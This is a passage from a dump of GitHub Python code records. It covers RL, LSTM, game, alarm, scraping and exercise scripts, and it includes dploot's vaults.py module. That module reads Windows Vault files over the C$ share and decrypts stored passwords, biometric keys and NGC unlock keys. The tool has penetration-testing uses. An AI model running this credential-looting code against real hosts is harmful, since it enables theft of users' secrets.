LOGGER.warning(\"<{file}> does not match name pattern.\".format(file=file_name))\n return\n self.exercise_id = match['eid']\n self.tu_id = match['tuid']\n self.last_name = match['ln']\n self.first_name = match['fn']\n\n @property\n def full_name(self) -> str:\n return '{fn} {ln}'.format(fn=self.first_name, ln=self.last_name)\n\n def file_name(self, data_format: str = 'json') -> str:\n return f'{self.exercise_id}_{self.tu_id}_{self.last_name}_{self.first_name}.{data_format}'\n\n def __str__(self):\n return '{0}'.format(self.exercise_id)\n","repo_name":"dst97/BUtils","sub_path":"butils/rubrics.py","file_name":"rubrics.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74436958199","text":"from ActorCritic import CPVer, CartPoleActorCritic\nimport tqdm\nimport statistics\nfrom collections import deque\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\n\nif __name__ == '__main__':\n num_actions = 2 # env.action_space.n\n num_hidden_units = 128\n\n ai = CartPoleActorCritic(num_actions, num_hidden_units, CPVer.V0)\n # Training goals\n min_episodes = 100\n max_episodes = 1000\n\n # Cartpole V0 is terminated after up to 200 steps, V1 after 500\n max_steps_per_episode = 200\n\n # Cartpole-v0 is considered solved if average reward is >= 195 over 100 consecutive trials\n # Cartpole-v0 is considered solved if average reward is >= 475 over 100 consecutive trials\n reward_threshold = 195\n\n # Discount factor for future rewards\n gamma = 0.99\n\n # Keep last episodes reward\n episodes_reward = deque(maxlen=min_episodes)\n\n # Reward array for statistic\n rewards = []\n episodes = []\n rendered = []\n with tqdm.tqdm(range(max_episodes)) as t:\n for i in t:\n episode_reward = int(ai.train_step(gamma, max_steps_per_episode))\n episodes_reward.append(episode_reward)\n\n running_reward = statistics.mean(episodes_reward)\n rewards.append(running_reward)\n episodes.append(episode_reward)\n\n t.set_description(f'Episode {i}')\n t.set_postfix(episode_reward=episode_reward,\n running_reward=running_reward)\n\n # If True we got it!\n if running_reward > reward_threshold and i >= min_episodes:\n 
ai.save_model('model.pickle')\n break\n \n plt.plot(rewards)\n plt.show()\n\n plt.plot(episodes)\n plt.show()\n\n\n # ai.load_model('model.pickle')\n rendered[0].save(str('game.gif'), save_all=True,\n append_images=rendered, loop=0, duration=20)\n\n # ai.render_episode(max_steps_per_episode, sleep_sec=0.0025)\n # ai.episode_into_gif('game.gif')\n","repo_name":"adriankucharski/pole-cart-rl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14393198244","text":"import logging\nimport ntpath\nfrom typing import Any, List\nfrom binascii import hexlify\n\nfrom impacket.structure import hexdump\nfrom impacket.dcerpc.v5.dtypes import RPC_SID\nfrom impacket.dpapi import VAULT_INTERNET_EXPLORER, VAULT_WIN_BIO_KEY, VAULT_NGC_ACCOOUNT\n\nfrom dploot.lib.dpapi import decrypt_vcrd, decrypt_vpol, find_masterkey_for_vpol_blob\nfrom dploot.lib.smb import DPLootSMBConnection\nfrom dploot.lib.target import Target\nfrom dploot.lib.utils import is_guid\nfrom dploot.triage.masterkeys import Masterkey\n\nclass VaultCred:\n def __init__(self, winuser, blob, type: \"VAULT_INTERNET_EXPLORER|VAULT_WIN_BIO_KEY|VAULT_NGC_ACCOOUNT| Any\", username: str = None, resource: str = None, password: str = None, sid: str = None, friendly_name: str = None, biometric_key: str = None, unlock_key: str = None, IV: str = None, cipher_text: str = None):\n self.blob = blob\n self.winuser = winuser\n if type is VAULT_INTERNET_EXPLORER:\n self.type = 'Internet Explorer'\n self.username = username\n self.resource = resource\n self.password = password\n elif type is VAULT_WIN_BIO_KEY:\n self.type = 'WINDOWS BIOMETRIC KEY'\n self.sid = sid\n self.friendly_name = friendly_name\n self.biometric_key = biometric_key\n elif type is VAULT_NGC_ACCOOUNT:\n self.type = 'NGC LOCAL ACCOOUNT'\n self.sid = sid\n self.friendly_name = friendly_name\n self.unlock_key = unlock_key\n self.IV = IV\n self.cipher_text = cipher_text\n else:\n self.type = 'None'\n \n def dump(self) -> None:\n self.blob.dump()\n if self.password is not None:\n print('Decoded Password: %s' % self.password)\n print()\n\n def dump_quiet(self) -> None:\n if self.type == 'Internet Explorer':\n print(\"[Internet Explorer] %s - %s:%s\" % (self.resource, self.username, self.password))\n\nclass VaultsTriage:\n\n false_positive = ['.','..', 'desktop.ini','Public','Default','Default User','All Users']\n user_vault_generic_path = [\n 'Users\\\\%s\\\\AppData\\\\Local\\\\Microsoft\\\\Vault',\n 'Users\\\\%s\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault',\n ]\n system_vault_generic_path = [\n \"Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\",\n \"Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\LocalService\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\NetworkService\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\",\n \"Windows\\\\ServiceProfiles\\\\NetworkService\\\\AppData\\\\Roaming\\\\Microsoft\\\\Vault\"\n ]\n share = 'C$'\n vpol_filename = 'Policy.vpol'\n\n def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: List[Masterkey]) -> None:\n self.target = target\n self.conn = conn\n \n self._users = None\n self.looted_files = dict()\n self.masterkeys = masterkeys\n\n def 
triage_system_vaults(self) -> List[VaultCred]:\n vaults_creds = list()\n vault_dirs = self.conn.listDirs(self.share, self.system_vault_generic_path)\n for system_vault_path,system_vault_dir in vault_dirs.items():\n if system_vault_dir is not None:\n vaults_creds += self.triage_vaults_folder(user = 'SYSTEM', vaults_folder_path=system_vault_path,vaults_folder=system_vault_dir)\n return vaults_creds\n\n def triage_vaults(self) -> List[VaultCred]:\n vaults_creds = list()\n for user in self.users:\n try:\n vaults_creds += self.triage_vaults_for_user(user) \n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.debug(str(e))\n pass\n return vaults_creds\n\n def triage_vaults_for_user(self, user:str) -> List[VaultCred]:\n vaults_creds = list()\n vault_dirs = self.conn.listDirs(self.share, [elem % user for elem in self.user_vault_generic_path])\n for user_vault_path,user_vault_dir in vault_dirs.items():\n if user_vault_dir is not None:\n vaults_creds += self.triage_vaults_folder(user=user, vaults_folder_path=user_vault_path,vaults_folder=user_vault_dir)\n return vaults_creds\n\n def triage_vaults_folder(self, user, vaults_folder_path, vaults_folder) -> List[VaultCred]:\n vaults_creds = list()\n for d in vaults_folder:\n if is_guid(d.get_longname()) and d.is_directory()>0:\n vault_dirname = d.get_longname()\n vault_directory_path = ntpath.join(vaults_folder_path,vault_dirname)\n logging.debug(\"Found Vault Directory: \\\\\\\\%s\\\\%s\\\\%s\\n\" % (self.target.address,self.share,vault_directory_path))\n \n # read vpol blob\n vpol_filepath = ntpath.join(vault_directory_path,self.vpol_filename)\n vpolblob_bytes = self.conn.readFile(self.share,vpol_filepath)\n vpol_keys = list()\n if vpolblob_bytes is not None and self.masterkeys is not None:\n self.looted_files[vault_dirname + '_' + self.vpol_filename] = vpolblob_bytes \n masterkey = find_masterkey_for_vpol_blob(vpolblob_bytes, self.masterkeys)\n if masterkey is not None:\n vpol_decrypted = decrypt_vpol(vpolblob_bytes,masterkey)\n if vpol_decrypted['Key1']['Size'] > 0x24:\n vpol_keys.append(\n hexlify(vpol_decrypted['Key2']['bKeyBlob']))\n vpol_keys.append(\n hexlify(vpol_decrypted['Key1']['bKeyBlob']))\n else:\n vpol_keys.append(\n hexlify(\n vpol_decrypted['Key2']['bKeyBlob']['bKey']).decode('latin-1'))\n vpol_keys.append(\n hexlify(\n vpol_decrypted['Key1']['bKeyBlob']['bKey']).decode('latin-1'))\n else:\n logging.debug(\"Could not decrypt...\")\n\n # read vrcd blob\n vault_dir = self.conn.remote_list_dir(self.share, vault_directory_path)\n for file in vault_dir:\n filename = file.get_longname()\n if filename != self.vpol_filename and filename not in self.false_positive and file.is_directory() == 0 and filename[-4:] == 'vcrd':\n vrcd_filepath = ntpath.join(vault_directory_path,filename)\n vrcd_bytes = self.conn.readFile(self.share, vrcd_filepath)\n self.looted_files[vault_dirname + '_' + vrcd_filepath] = vpolblob_bytes \n if vrcd_bytes is not None and filename[-4:] in ['vsch','vcrd'] and len(vpol_keys) > 0:\n vault = decrypt_vcrd(vrcd_bytes, vpol_keys)\n if isinstance(vault, (VAULT_INTERNET_EXPLORER, VAULT_WIN_BIO_KEY, VAULT_NGC_ACCOOUNT)):\n if isinstance(vault, VAULT_INTERNET_EXPLORER):\n vaults_creds.append(VaultCred(winuser=user, blob=vault, type=type(vault), username=vault['Username'].decode('utf-16le'),resource=vault['Resource'].decode('utf-16le'), password=vault['Password'].decode('utf-16le') ))\n elif isinstance(vault, VAULT_WIN_BIO_KEY):\n 
vaults_creds.append(VaultCred(winuser=user, blob=vault, type=type(vault), sid=RPC_SID(b'\\x05\\x00\\x00\\x00'+vault['Sid']).formatCanonical(), friendly_name=vault['Name'].decode('utf-16le'), biometric_key=(hexlify(vault['BioKey']['bKey'])).decode('latin-1')))\n                            elif isinstance(vault, VAULT_NGC_ACCOOUNT):\n                                vaults_creds.append(VaultCred(winuser=user, blob=vault, type=type(vault), sid=RPC_SID(b'\\x05\\x00\\x00\\x00'+vault['Sid']).formatCanonical(), friendly_name=vault['Name'].decode('utf-16le'), biometric_key=(hexlify(vault['BioKey']['bKey'])).decode('latin-1'), unlock_key=hexlify(vault["UnlockKey"]), IV=hexlify(vault["IV"]), cipher_text=hexlify(vault["CipherText"])))\n                            else:\n                                logging.debug('Vault decrypted but unknown data structure:')\n        return vaults_creds\n\n    @property\n    def users(self) -> List[str]:\n        if self._users is not None:\n            return self._users\n        \n        users = list()\n\n        users_dir_path = 'Users\\\\*'\n        directories = self.conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path))\n        for d in directories:\n            if d.get_longname() not in self.false_positive and d.is_directory() > 0:\n                users.append(d.get_longname())\n        \n        self._users = users\n\n        return self._users","repo_name":"zblurx/dploot","sub_path":"dploot/triage/vaults.py","file_name":"vaults.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"40"}
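The `users` property at the end of the record above fetches the remote directory listing once and then serves the memoized `_users` list. A stdlib-only sketch of that caching pattern; `_list_remote_users` below is a hypothetical stand-in for the SMB `listPath` call, not dploot's API:

from typing import List, Optional

class UserCache:
    """Compute an expensive remote listing once, then serve the cached copy."""

    def __init__(self) -> None:
        self._users: Optional[List[str]] = None  # None means "not fetched yet"

    def _list_remote_users(self) -> List[str]:
        # Hypothetical stand-in for conn.listPath(...) over SMB.
        return ["Administrator", "alice", "bob"]

    @property
    def users(self) -> List[str]:
        if self._users is None:  # only hit the remote share on first access
            self._users = self._list_remote_users()
        return self._users

cache = UserCache()
assert cache.users is cache.users  # second access reuses the cached list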
+{"seq_id":"5398685750","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport time\nimport warnings\nimport numpy as np\nfrom numpy import newaxis\nfrom keras.layers.core import Dense, Activation, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.models import Sequential\n\n\n# In[3]:\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[4]:\n\n\ndef load_data(filename, seq_len, normalise_window):\n    f = open(filename, 'rb').read()\n    data = f.decode().split('\\n')\n    \n    sequence_length = seq_len + 1\n    result = []\n    for index in range(len(data) - sequence_length):\n        result.append(data[index: index + sequence_length])\n    \n    if normalise_window:\n        result = normalise_windows(result)\n    \n    result = np.array(result)\n    \n    row = round(0.9 * result.shape[0])\n    train = result[:int(row),:]\n    np.random.shuffle(train)\n    x_train = train[:,:-1]\n    y_train = train[:, -1]\n    x_test = result[int(row):, :-1]\n    y_test = result[int(row):, -1]\n    \n    x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n    x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\n    \n    return [x_train, y_train, x_test, y_test]\n\n\n# In[5]:\n\n\ndef normalise_windows(window_data):\n    normalised_data = []\n    for window in window_data:\n        normalised_window = [((float(p) / float(window[0])) - 1) for p in window]\n        normalised_data.append(normalised_window)\n    return normalised_data\n\n\n# In[6]:\n\n\ndef build_model(layers):\n    model = Sequential()\n    \n    model.add(LSTM(input_shape = (layers[1], layers[0]),\n                  output_dim = layers[1],\n                  return_sequences=True))\n    model.add(Dropout(0.2))\n    \n    model.add(LSTM(layers[2], return_sequences=False))\n    model.add(Dropout(0.2))\n    \n    model.add(Dense(output_dim = layers[3]))\n    model.add(Activation(\"linear\"))\n    \n    start = time.time()\n    model.compile(loss=\"mse\", optimizer = 'rmsprop')\n    print(\"compile time: \", time.time() - start)\n    return model\n\n\n# In[7]:\n\n\ndef predict_point_by_point(model, data):\n    predicted = model.predict(data)\n    predicted = np.reshape(predicted, (predicted.size,))\n    return predicted\n\n\n# In[8]:\n\n\ndef predict_sequence_full(model, data, window_size):\n    curr_frame = data[0]\n    predicted = []\n    for i in range(len(data)):\n        predicted.append(model.predict(curr_frame[newaxis,:,:])[0,0])\n        curr_frame = curr_frame[1:]\n        curr_frame = np.insert(curr_frame, [window_size-1], predicted[-1], axis=0)\n    return predicted\n\n\n# In[9]:\n\n\ndef predict_sequences_multiple(model, data, window_size, prediction_len):\n    prediction_seqs = []\n    for i in range(len(data)//prediction_len):\n        curr_frame = data[i*prediction_len]\n        predicted = []\n        for j in range(prediction_len):\n            predicted.append(model.predict(curr_frame[newaxis, :, :])[0,0])\n            curr_frame = curr_frame[1:]\n            curr_frame = np.insert(curr_frame, [window_size-1], predicted[-1], axis=0)\n        prediction_seqs.append(predicted)\n    return prediction_seqs\n\n\n# In[12]:\n\n\n#import subprocess\n#subprocess.run(['jupyter', 'nbconvert', '--to', 'python', 'filename.ipynb'])\n\n","repo_name":"DoChi72/jupyter_notebooks","sub_path":"intern_works/RNN_machinelerning_study/sandp_lstm/lstm_writed.py","file_name":"lstm_writed.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
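The `load_data` routine in the record above slices a series into overlapping windows and reshapes them to the (samples, timesteps, features) layout Keras LSTMs expect. A numpy-only sketch of that windowing step on a hypothetical toy series, no Keras required:

import numpy as np

series = np.arange(10, dtype=float)            # toy stand-in for the loaded prices
seq_len = 3
windows = np.array([series[i:i + seq_len + 1]  # seq_len inputs plus 1 target
                    for i in range(len(series) - seq_len - 1)])

x = windows[:, :-1]                             # inputs: every column but the last
y = windows[:, -1]                              # target: the last column
x = np.reshape(x, (x.shape[0], x.shape[1], 1))  # -> (samples, timesteps, features=1)
print(x.shape, y.shape)                         # (6, 3, 1) (6,)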
+{"seq_id":"38004595389","text":"import random\r\nfrom art import logo\r\nfrom replit import clear\r\ncards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\nstart=input(\"Do you want to play blackjack.\\nType y to play and n to stop\").lower()\r\nif start == 'y':\r\n    end = False\r\nelif start == 'n':\r\n    end = True\r\n    clear()\r\nelse:\r\n    print(\"Invalid input !!!\")\r\n    end = True\r\n\r\nwhile not end:\r\n    user=[]\r\n    computer=[]\r\n    for i in range(2):\r\n        user.append(random.choice(cards))\r\n        computer.append(random.choice(cards))\r\n    sum1=sum(user)\r\n    sum2=sum(computer)\r\n    print(f\"Your cards are {user} which totals : {sum1}\\nComputer one card is {computer[random.randint(0,1)]}\")\r\n    draw_card = False \r\n    while not draw_card:\r\n        choice=input(\"Do you want to draw another card\").lower()\r\n        if choice == 'y':\r\n            another_card = random.choice(cards)\r\n            if another_card == 11:\r\n                x=sum1 + another_card\r\n                if x > 21:\r\n                    another_card = 1\r\n                else:\r\n                    another_card = 11\r\n            user.append(another_card)\r\n            sum1_2 = sum(user)\r\n            sum1 = sum1_2\r\n            print(f\"Another card is {another_card} which totals to : {sum1}\")\r\n        else:\r\n            draw_card = True\r\n    if sum1 > sum2 and sum1 <= 21 :\r\n        print(f\"Computer cards are {computer} which totals to {sum2}\")\r\n        print(\"You win\")\r\n    elif sum1 > 21 or sum1 < sum2:\r\n        print(f\"Computer cards are {computer} which totals to {sum2}\")\r\n        print(\"You lose\")\r\n    start_again=input(\"Do you want to play again\\nType 'y' for yes and 'n' for no\").lower()\r\n    if start_again == 'y':\r\n        clear()\r\n    else:\r\n        end = True","repo_name":"SudeepNadgambe/cv","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
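The record above re-values a freshly drawn ace (11 to 1) only when that single card would bust the hand. The usual generalisation also downgrades aces already held; a self-contained sketch of that scoring rule (the function name is illustrative, not from the original script):

def hand_value(cards):
    """Score a blackjack hand, counting 11-valued aces as 1 while the hand busts."""
    total = sum(cards)
    aces = cards.count(11)
    while total > 21 and aces:
        total -= 10  # one ace now counts as 1 instead of 11
        aces -= 1
    return total

print(hand_value([11, 10]))     # 21
print(hand_value([11, 10, 5]))  # 16: the ace drops to 1 instead of busting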
+{"seq_id":"23280912512","text":"\"\"\"\n# author: chenyi\n# ide: notepad++\n# date: 16:46 2022-11-28\n# version: 1.0.0\n# Alarm-clock program: plays an MP3 at the scheduled times\n\"\"\"\nimport multiprocessing\n# play mp3 module\nfrom playsound import playsound\nimport time\n# threading module\nimport _thread\n\nMP3 = r'F:\\mp3\\yesterday once more.mp3'  # global path to the MP3 file\n\n# get the local machine time\ndef showTime():\n    \"\"\"Show the current time\"\"\"\n    t = time.localtime()  # snapshot of the local time\n    global get_hour, get_minute, get_second\n    get_hour = t.tm_hour  # local hour\n    get_minute = t.tm_min  # local minute\n    get_second = t.tm_sec  # local second\n    return '%02d:%02d:%02d' %(get_hour, get_minute, get_second)\n\n\n# playback function\ndef playMp3(playLen = 180):\n    # play the MP3 in a child process\n    p = multiprocessing.Process(target=playsound, args=(MP3,))\n    p.start()  # start playing the mp3\n    stopTime= playLen  # playback length in seconds\n    # count down while the music plays\n    while stopTime:\n        time.sleep(1)\n        stopTime -= 1\n    p.terminate()  # time is up, stop the mp3\n\n\n# time-monitoring function\ndef monitorTime(h, m, s=0):\n    setClockHour = h\n    setClockMin = m\n    setClocksecond = s\n    # watch the clock; when the set time arrives, call playMp3()\n    if get_hour == setClockHour and get_minute == setClockMin and get_second==setClocksecond:\n        print('%02d:%02d:%02d,clock 1, start mp3' %(get_hour, get_minute, get_second))\n        # playMp3()  # direct call\n        _thread.start_new_thread( playMp3, (180,) )  # run playMp3 on another thread\n    elif setClockHour == -1 and get_minute == setClockMin and get_second==setClocksecond:  # run playMp3 once at minute setClockMin of every hour\n        print('>>>%2d:%02d,clock minute, start mp3' %( get_minute, get_second))\n        _thread.start_new_thread( playMp3, (120,) )  # run playMp3 on another thread\n    elif setClockHour == -1 and setClockMin == -1 and get_second==setClocksecond:  # run playMp3 at second setClocksecond of every minute\n        print('>>>%02d,clock second, start mp3' %(get_second))\n        _thread.start_new_thread( playMp3, (15,) )  # run playMp3 on another thread\n\n    \"\"\"\n    # how to use this function's parameters\n    monitorTime(12,30,30)  # 12:30:30 ring every day at 12:30:30\n    monitorTime(-1,30,30)  # -1,30,30 ring at minute 30, second 30 of every hour\n    monitorTime(-1,-1,30)  # -1,-1,30 ring at second 30 of every minute\n    monitorTime(-1,-1,-1)  # -1,-1,-1 disable the alarm in that slot\n    \"\"\"\n\nif __name__ == '__main__':\n    # set the alarm times as a 2-D list of [hour, minute, second]\n    # setColock = [[13, 15, 0], [14, 30, 0], [-1, -1, 1], [-1, -1, 20], [-1, -1, 40]]\n    setColock = [[13, 15, 0], [14, 30, 0], [-1, 57, 1], [-1, -1, -1], [-1, -1, -1]]\n    # setColock = [[-1, -1, 'd']]  # a single one-dimensional entry also works\n    while True:\n        print(showTime())\n        time.sleep(1)\n        # showTime()\n        for i in setColock:  # walk the list and hand each entry to monitorTime\n            monitorTime(i[0], i[1], i[2])\n","repo_name":"sssschenyi/tools","sub_path":"2play_mp3.py","file_name":"2play_mp3.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12622277166","text":"def reverse(x: int):\n    if x == 0:\n        return 0\n    \n    tempStr = str(abs(x))\n    answer = 0\n    \n    xList = list(tempStr)\n    xList.reverse()\n    \n    while xList[0] == '0':\n        del xList[0]\n    \n    if x < 0:\n        answer = int('-' + ''.join(xList))\n        if answer < -2**31:\n            return 0\n        return answer\n    elif x > 0:\n        answer = int(''.join(xList))\n        if answer > 2**31-1:\n            return 0\n        return answer\n    else:\n        return 0\n    \ntemp = '-021'\nprint(int(temp))","repo_name":"kkkapuq/AlgorithmStudy","sub_path":"Python/220815_Leetcode_7. 
Reverse Integer/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9910229860","text":"# question1.py\n# prints out list in the order that the user entered it but without duplicates\n# camilla craven\n# 28 april 2014\n\n\nstring = input(\"Enter strings (end with DONE):\\n\")\n\nList = []\n\nwhile string != \"DONE\": # creating sentinel loop (will end when user enters \"DONE\")\n \n # to avoid duplicates, only add string not already in list \n if string not in List:\n List.append(string) \n \n # if string already in list, it is not added\n else: \n None\n \n string = input() # prompts user for more strings\n \n \nprint()\nprint(\"Unique list:\")\n\n# print every string in list (in order)\nfor i in List:\n print(i)\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/crvcam001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8257961984","text":"class ComplexLinkedListNode(object):\n def __init__(self, value=None, next=None, sibling=None):\n self.value = value\n self.next = next\n self.sibling = sibling\n\n def __str__(self):\n return str(self.value)\n\n\nclass LinkedList(object):\n def __init__(self, header=None):\n self.header = header\n\n\ndef clone_nodes(head):\n if not isinstance(head, ComplexLinkedListNode):\n raise TypeError\n\n node = head\n while node is not None:\n clone_node = ComplexLinkedListNode(node.value)\n clone_node.next = node.next\n node.next = clone_node\n node = clone_node.next\n\n\ndef clone_sibling(head):\n node = head\n while node is not None:\n clone_node = node.next\n if node.sibling is not None:\n clone_node.sibling = node.sibling.next\n node = clone_node.next\n\n\ndef split_linkedList(head):\n clone_head = head.next\n node = head\n clone_node = clone_head\n while node is not None:\n node.next = clone_node.next\n node = node.next\n if node is not None:\n clone_node.next = node.next\n clone_node = clone_node.next\n return clone_head\n\n\n# time O(n)\ndef complex_linkedList_clone(head):\n # step one, clone every node\n clone_nodes(head)\n # step two, set sibling\n clone_sibling(head)\n # step three, split linkedList\n clone_head = split_linkedList(head)\n return clone_head\n\n\ndef test():\n a = ComplexLinkedListNode('a')\n b = ComplexLinkedListNode('b')\n c = ComplexLinkedListNode('c')\n d = ComplexLinkedListNode('d')\n e = ComplexLinkedListNode('e')\n a.next = b\n b.next = c\n c.next = d\n d.next = e\n a.sibling = c\n b.sibling = e\n d.sibling = b\n linked_list = LinkedList(a)\n head = linked_list.header\n print('raw', id(head.sibling), head.sibling)\n print('raw', id(head.next.sibling), head.next.sibling)\n # while head is not None:\n # print(head)\n # head = head.next\n clone_head = complex_linkedList_clone(linked_list.header)\n print('sibling', id(clone_head.sibling), clone_head.sibling)\n print('sibling', id(clone_head.next.sibling), clone_head.next.sibling)\n while clone_head is not None:\n print(clone_head)\n clone_head =clone_head.next\n\n\nif __name__ == '__main__':\n test()","repo_name":"realRichard/-offer","sub_path":"chapterFour/breakDown/complexLinkedListClone/1.3.py","file_name":"1.3.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17868417318","text":"from 
bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport numpy as np\nimport sqlite3\nimport enum\n\n#Collects the html from the source page\ndef getHTML(link):\n source = requests.get(link).text\n soup = BeautifulSoup(source,'lxml')\n return soup\n\n#Collects the table from ukpollingreport for polls before 2020\ndef getPre2020Table(soup):\n table = soup.find('div', class_='polltable').find('table')\n return table\n\n#Formats the dates of each poll\ndef parseDate(date,year):\n dateLib = {'Jan':'1','Feb':'2','Mar':'3','Apr':'4','May':'5','Jun':'6','Jul':'7','Aug':'8','Sep':'9','Oct':'10','Nov':'11','Dec':'12'}\n dateString = str(year) + '-' + dateLib[date[-3:]] +'-'\n dateList = date.split(' ')\n if len(dateList[-2]) < 3:\n dateString += dateList[-2]\n elif dateList[-2][-2] == '–':\n dateString += dateList[-2][-1]\n elif dateList[-2][-3] == '–':\n dateString += dateList[-2][-2:]\n return dateString\n\n#Puts the ukpollingreport polls into an array\ndef pre2020TableToArray(table):\n rows = table.find_all('tr')\n headers = rows[0].find_all('td')\n array = []\n\n for header in range(len(headers)):\n headers[header] = headers[header].text.replace('\\n', '')\n rows.pop(0)\n\n for row in rows:\n data = row.find_all('td')\n if len(data) == len(headers):\n blank = 0\n for datum in range(len(data)):\n data[datum] = data[datum].text.replace('\\n', '')\n if datum in [2,3,4,6] and len(data[datum].strip()) == 0:\n blank += 1\n if data[1].strip()[:4] != '2020' and blank == 0: #updated to not include from 2020 or any where data is missing for a party\n array.append(data)\n return array\n\n#Turns the array into a pandas dataframe\ndef pre2020PollsToDF():\n soup = getHTML('http://ukpollingreport.co.uk/voting-intention-2')\n table = getPre2020Table(soup)\n data = pre2020TableToArray(table)\n df = pd.DataFrame(data,columns=['pollster','date','con','lab','libdem','ukip','green','con lead'])\n df = df.drop(['ukip', 'con lead'],axis=1)\n return df\n\n#Gets either the 2020 or 2021 poll table from wikipedia\ndef getNewTable(soup,index):\n tables = soup.find_all('table', class_='wikitable sortable mw-datatable')\n table = tables[index].tbody()\n return table\n\n#Turns the 2020/2021 table into an array\ndef newTableToArray(rows,index):\n headers = rows[0].find_all('th')\n array = []\n\n for header in range(len(headers)):\n headers[header] = headers[header].text.replace('\\n', '')\n rows.pop(0)\n\n for row in rows:\n data = row.find_all('td')\n if len(data) == len(headers):\n for datum in range(len(data)):\n if datum == 2:\n data[datum] = parseDate(data[datum].text.replace('\\n',''),2021-index)\n else:\n data[datum] = data[datum].text.replace('\\n', '').replace('%','')\n array.append(data)\n return array\n\n#Converts the array to a dataframe\ndef newPollsToDF(index):\n soup = getHTML('https://en.wikipedia.org/wiki/Opinion_polling_for_the_next_United_Kingdom_general_election')\n table = getNewTable(soup,index)\n data = newTableToArray(table,index)\n df = pd.DataFrame(data,columns=['pollster','client','date','area','samplesize','con','lab','libdem','snp','green','others','lead'])\n df = df.drop(['client','area','samplesize','snp','others','lead'],axis=1)\n return df\n\n#Takes a dataframe of polls and inserts them into the database\ndef pollsToDB(polls):\n conn = sqlite3.connect('sortedTweets.db')\n c = conn.cursor()\n for index, row in polls.iterrows():\n c.execute('INSERT INTO polls (pollster,date,con,lab,libdem,green) VALUES 
(?,?,?,?,?,?);',(row['pollster'],row['date'],row['con'],row['lab'],row['libdem'],row['green']))\n conn.commit()\n conn.close()\n\n#Takes brand new polls and inserts them into the database\ndef newPollsToDB():\n newPolls = newPollsToDF(0)\n conn = sqlite3.connect('sortedTweets.db')\n c = conn.cursor()\n earliest2021Id = 2137\n c.execute('SELECT pollster,date,con,lab,libdem,green FROM polls WHERE id > ?',(earliest2021Id,))\n existing = dbToDf(c.fetchall())\n complement = newPolls.merge(existing, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n complement.drop(['_merge'],axis=1)\n print('Polls to be added to db:')\n print(complement)\n pollsToDB(complement.iloc[::-1])\n\n#Converts polls selected from a database to a dataframe\ndef dbToDf(polls):\n df = pd.DataFrame(polls,columns=['pollster','date','con','lab','libdem','green'])\n return df \n\n#Creates the poll table in sortedTweets.db\ndef makePollTable(file):\n conn = sqlite3.connect(file)\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS polls (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n pollster TEXT,\n date TEXT,\n con TEXT,\n lab TEXT,\n libdem TEXT,\n green TEXT,\n positiveTweets TEXT,\n negativeTweets TEXT,\n sentiment TEXT\n )\n ''')\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n # pollsPre2020 = pre2020PollsToDF()\n # polls2020 = newPollsToDF(1)\n # polls2021 = newPollsToDF(0)\n # pre2021Polls = polls2020.append(pollsPre2020)\n # allPolls = polls2021.append(pre2021Polls)\n # makePollTable()\n # pollsToDB(allPolls.iloc[::-1])\n newPollsToDB()","repo_name":"swright3/cs310project","sub_path":"pollparser2.py","file_name":"pollparser2.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16839473552","text":"from utils import load_data\n\nimport torch\nimport torchvision\nimport torch.utils.tensorboard as tb\nfrom torchvision import transforms\n\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n\nclass CNNClassifier(torch.nn.Module):\n class Block(torch.nn.Module):\n def __init__(self, input_channels, output_channels, stride):\n super().__init__()\n self.net = torch.nn.Sequential(\n 